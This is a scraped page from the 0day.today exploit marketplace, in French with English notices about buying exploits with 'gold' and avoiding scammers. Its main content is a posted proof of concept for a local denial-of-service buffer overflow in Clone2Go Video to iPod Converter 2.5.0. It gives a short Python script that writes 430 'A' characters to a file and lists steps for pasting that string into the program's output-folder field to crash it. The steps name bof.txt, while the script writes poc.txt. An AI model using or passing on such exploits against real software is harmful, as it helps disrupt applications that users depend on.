0day.today - La plus grande base de données de Exploit dans le monde.
![](/img/logo_green.jpg)
Nous utilisons un domaine DOMAIN_LINK
Si vous voulez acheter un exploit ou payer un service vous avez besoins d'Or. Nous ne voulons pas que notre site soit utiliser comme outil de piratage , de sorte que touts types d'actions qui pourrais affecter illegalement d'autres utilisateurs ou sites web ou vous n'avez pas l'autorisation vous serez bannit et votre compte ainsi que vos donnees seront supprimees.
Les administrateur de 0day.today utilises des moyens de contacts officiels. Mefiez-vous des imposteurs!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Lire le [ J'accepte ]
- Lire le [ Envoyer ] Regles
- Visiter le [ faq ] page
- [ Enregistrement ] profil
- Obtenir [ GOLD ]
- Si vous voulez [ vendre ]
- Si vous voulez [ acheter ]
- Si vous vous perdez [ Compte ]
- Une questions [ [email protected] ]
- Connexion
- Page d'enregistrement
- Restauration de compte
- Foire aux questions
- Contactez-nous
- Regle de publication
- Page de contrat
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vous pouvez nous contacter par:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Clone2Go Video to iPod Converter 2.5.0 - Denial of Service Exploit
Auteur
Risque
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Catégorie
Date d'ajout
Plateforme
# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC) # Exploit Author: ZwX # Vendor Homepage : http://www.clone2go.com/ # Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe # Tested on OS: Windows 7 # Proof of Concept (PoC): # The local buffer overflow vulnerability can be exploited by local attackers with # restricted system user account without user interaction. For security demonstration # or to reproduce follow the provided information and steps below to continue. # Manual steps to reproduce the vulnerability ... # 1 Install the software and start the client # 2 Copy the AAAA...string from bof.txt to clipboard # 3 Run VideoConverter.exex # 4 Go Menu Menu > Edit > Options > Set Output folder (Input) # 5 Paste it the input AAAA....string and click Open # 6 A messagebox opens click ok # 7 Software will stable crash or shut down # 8 Successful reproduce of the Denial of Service #!/usr/bin/python buffer = "\x41" * 430 poc = buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX" # 0day.today [2024-07-16] #